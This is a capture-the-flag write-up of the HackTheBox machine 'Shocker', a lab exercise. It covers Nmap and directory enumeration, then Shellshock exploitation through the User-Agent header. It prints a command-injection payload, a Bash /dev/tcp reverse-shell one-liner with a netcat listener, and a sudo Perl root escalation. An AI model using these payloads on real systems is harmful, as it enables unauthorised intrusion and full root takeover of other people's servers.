HackTheBox - Shocker

OS Difficulty IP Address Status
Linux Easy Retired

This was classified as an easy machine by mrb3n on HackTheBox. We will find a webpage on port 80 with an image, running a directory brute force on it with a trailing slash; we will find a user.sh. We will intercept this request, find out that it is vulnerable to ShellShock (CVE-2014-6271) and gain a foothold in the box. To privilege escalate, we will find that the user can run Perl as root, then we will run Perl to execute Bash.

Phase 1 - Enumeration


As usual, we start off with a Nmap to find out what ports are opened:

80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see there’s only two ports opened: a webserver running Apache on port 80 and OpenSSH on port 2222.

Port 80

Opening up the webpage in the browser, we only get an image:
enter image description here

Doing a directory brute force we find:

/cgi-bin/             (Status: 403) [Size: 294]

Doing another directory brute force on /cgi-bin/ we find:

/user.sh              (Status: 200) [Size: 119]

When we access user.sh, we can get an output that looks like the uptime command on Linux:

cat user.sh            
Content-Type: text/plain

Just an uptime test script

 20:40:25 up 27 min,  0 users,  load average: 0.00, 0.01, 0.00

Phase 2 - Exploitation


As the name of this box, ShellShock, suggests that it is vulnerable to ShellShock, AKA Bashdoor or CVE-2014-6271. This was a vulnerability discovered in Bash, back in 2014 which hash to with Bash syntax for defining functions.

Finding ShellShock

We can run a Nmap script scan to check for this:

nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-shellshock: 
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|     Disclosure date: 2014-09-24
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|       http://seclists.org/oss-sec/2014/q3/685
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

Reading a bunch of different articles and fuzzing the /cgi-bin/user.sh parameter in Burp Suite, we find a method to execute commands on the box:
enter image description here

The “User-Agent:” parameter can be abused by ShellShock and allow command execution:

User-Agent: () { :;}; echo; /usr/bin/id

We use echo because without it, it will return no value from the command. So let’s get a shell on ShellShock!

User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/ 0>&1
sudo nc -lvnp 443 
listening on [any] 443 ... 
connect to [] from (UNKNOWN) [] 45314 
bash: no job control in this shell 


And we get in as the user shelly!

Phase 3 - Privilege Escalation

Perl for Root

Checking what commands the user shelly can run as root, we see /usr/bin/perl

shelly@Shocker:/home/shelly$ sudo -l 
Matching Defaults entries for shelly on Shocker: 
    env_reset, mail_badpass,
User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl

Perl has a -e flag to execute from the command line, and it also has an exec command to run shell commands. Putting those two together we can run Bash as root.

shelly@Shocker:/home/shelly$  sudo perl -e  'exec "/bin/bash"'  


And we are root!